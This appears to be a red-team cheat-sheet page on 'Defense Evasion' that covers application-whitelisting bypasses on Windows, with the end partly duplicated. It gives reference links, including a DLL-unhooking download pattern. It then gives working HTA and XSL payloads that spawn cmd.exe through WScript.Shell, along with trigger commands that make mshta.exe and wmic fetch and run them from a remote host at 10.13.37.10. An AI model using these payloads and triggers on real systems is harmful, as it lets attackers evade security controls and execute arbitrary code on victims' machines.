Defense Evasion

Useful Links

Win32 API docs
NTAPI Undocumented Functions
Kernel-specific structures (pick the right kernel version / update)
DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAGE_FILE_HEADER.TimeDateStamp}{IMAGE_OPTIONAL_HEADER.SizeOfImage}/name.dll)
All in one NTAPI documentation and references
DotNet2JScript - A library used to encode DLL's to feed into other bypass projects.

APPLocker / Application Whitelisting Bypass

HTA

Trigger - `C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta`

<head> 
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>

XSL

Trigger - `wmic process get brief /format:"http://10.13.37.10/cmd.xsl"`

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell");
			r.Run("cmd.exe");
		]]>
	</ms:script>
</stylesheet>

Defense Evasion

Defense Evasion

Useful Links

APPLocker / Application Whitelisting Bypass

HTA

Trigger - C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta

XSL

Trigger - wmic process get brief /format:"http://10.13.37.10/cmd.xsl"

Trigger - `C:\Windows\System32\mshta.exe http://10.13.37.10/cmd.hta`

Trigger - `wmic process get brief /format:"http://10.13.37.10/cmd.xsl"`